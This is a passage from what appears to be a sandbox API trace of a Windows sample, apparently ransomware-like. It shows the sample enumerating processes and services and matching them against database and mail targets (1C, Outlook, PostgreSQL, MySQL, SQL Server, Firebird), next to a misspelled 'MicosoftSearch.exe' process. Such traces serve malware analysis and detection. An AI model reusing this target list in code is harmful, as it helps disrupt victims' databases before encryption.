(lpString1="sqlwriter", lpString2="UxSms") returned -1 [0263.596] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0263.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0263.596] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0263.596] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x380 [0263.597] Process32FirstW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.597] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0263.598] lstrlenW (lpString="System") returned 6 [0263.598] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0263.598] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0263.598] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0263.598] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0263.598] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0263.598] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0263.598] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0263.598] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0263.598] lstrlenW (lpString="smss.exe") returned 8 [0263.598] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0263.598] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0263.598] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0263.598] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0263.598] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0263.598] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0263.598] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0263.598] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.599] lstrlenW (lpString="csrss.exe") returned 9 [0263.599] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0263.599] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0263.599] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0263.599] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0263.599] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0263.599] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0263.599] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0263.599] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0263.599] lstrlenW (lpString="wininit.exe") returned 11 [0263.599] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0263.599] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0263.599] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0263.599] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0263.599] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0263.599] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0263.599] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0263.599] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.600] lstrlenW (lpString="csrss.exe") returned 9 [0263.600] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0263.600] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0263.600] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0263.600] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0263.600] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0263.600] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0263.600] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0263.600] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0263.600] lstrlenW (lpString="winlogon.exe") returned 12 [0263.600] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0263.600] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0263.600] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0263.600] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0263.600] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0263.600] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0263.600] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0263.600] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0263.601] lstrlenW (lpString="services.exe") returned 12 [0263.601] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0263.601] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0263.601] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0263.601] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0263.601] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0263.601] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0263.601] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0263.601] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0263.601] lstrlenW (lpString="lsass.exe") returned 9 [0263.601] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0263.601] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0263.601] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0263.601] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0263.601] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0263.601] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0263.601] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0263.601] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0263.602] lstrlenW (lpString="lsm.exe") returned 7 [0263.602] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0263.602] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0263.602] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0263.602] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0263.602] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0263.602] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0263.602] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0263.602] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.602] lstrlenW (lpString="svchost.exe") returned 11 [0263.602] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.602] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.602] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.602] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.602] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.602] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.602] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.602] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.603] lstrlenW (lpString="svchost.exe") returned 11 [0263.603] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.603] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.603] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.603] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.603] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.603] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.603] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.603] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.603] lstrlenW (lpString="svchost.exe") returned 11 [0263.603] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0263.603] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0263.603] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0263.603] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0263.603] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0263.603] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0263.603] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0263.603] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.603] lstrlenW (lpString="svchost.exe") returned 11 [0263.604] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.604] lstrlenW (lpString="svchost.exe") returned 11 [0263.604] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0263.604] lstrlenW (lpString="audiodg.exe") returned 11 [0263.604] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.604] lstrlenW (lpString="svchost.exe") returned 11 [0263.604] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.605] lstrlenW (lpString="svchost.exe") returned 11 [0263.605] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0263.605] lstrlenW (lpString="userinit.exe") returned 12 [0263.605] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0263.605] lstrlenW (lpString="dwm.exe") returned 7 [0263.605] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.606] lstrlenW (lpString="explorer.exe") returned 12 [0263.606] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0263.606] lstrlenW (lpString="spoolsv.exe") returned 11 [0263.606] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0263.606] lstrlenW (lpString="taskhost.exe") returned 12 [0263.606] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.606] lstrlenW (lpString="svchost.exe") returned 11 [0263.606] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0263.607] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0263.607] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0263.607] lstrlenW (lpString="reader_sl.exe") returned 13 [0263.607] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0263.607] CloseHandle (hObject=0x380) returned 1 [0263.607] Sleep (dwMilliseconds=0x1f4) [0264.223] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea498 [0264.799] EnumServicesStatusExW (in: hSCManager=0x47ea498, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0264.800] GetLastError () returned 0xea [0264.800] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0264.800] EnumServicesStatusExW (in: hSCManager=0x47ea498, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0264.800] CloseServiceHandle (hSCObject=0x47ea498) returned 1 [0264.800] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0264.800] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0264.800] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0264.800] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0264.800] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0264.800] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0264.800] lstrlenW (lpString="AudioSrv") returned 8 [0264.800] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0264.800] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0264.800] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0264.800] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0264.800] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0264.800] lstrlenW (lpString="BFE") returned 3 [0264.800] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0264.800] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0264.801] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0264.801] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0264.801] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0264.801] lstrlenW (lpString="CryptSvc") returned 8 [0264.801] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0264.801] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0264.801] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0264.801] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0264.801] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0264.801] lstrlenW (lpString="CscService") returned 10 [0264.801] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0264.801] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0264.801] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0264.801] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0264.801] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0264.801] lstrlenW (lpString="DcomLaunch") returned 10 [0264.801] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0264.801] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0264.801] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0264.801] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0264.801] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0264.801] lstrlenW (lpString="Dhcp") returned 4 [0264.801] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0264.801] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0264.801] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0264.801] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0264.801] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0264.801] lstrlenW (lpString="Dnscache") returned 8 [0264.801] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0264.801] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0264.801] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0264.801] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0264.801] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0264.802] lstrlenW (lpString="DPS") returned 3 [0264.802] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0264.802] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0264.802] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0264.802] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0264.802] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0264.802] lstrlenW (lpString="eventlog") returned 8 [0264.802] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0264.802] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0264.802] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0264.802] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0264.802] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0264.802] lstrlenW (lpString="EventSystem") returned 11 [0264.802] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0264.802] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0264.802] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0264.802] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0264.802] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0264.802] lstrlenW (lpString="gpsvc") returned 5 [0264.802] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0264.802] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0264.802] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0264.802] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0264.802] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0264.802] lstrlenW (lpString="LanmanWorkstation") returned 17 [0264.802] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0264.802] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0264.802] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0264.802] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0264.802] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0264.802] lstrlenW (lpString="lmhosts") returned 7 [0264.802] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0264.803] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0264.803] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0264.803] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0264.803] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0264.803] lstrlenW (lpString="MMCSS") returned 5 [0264.803] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0264.803] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0264.803] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0264.803] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0264.803] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0264.803] lstrlenW (lpString="MpsSvc") returned 6 [0264.803] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0264.803] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0264.803] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0264.803] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0264.803] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0264.803] lstrlenW (lpString="NlaSvc") returned 6 [0264.803] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0264.803] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0264.803] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0264.803] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0264.803] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0264.803] lstrlenW (lpString="nsi") returned 3 [0264.803] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0264.803] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0264.803] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0264.803] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0264.803] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") 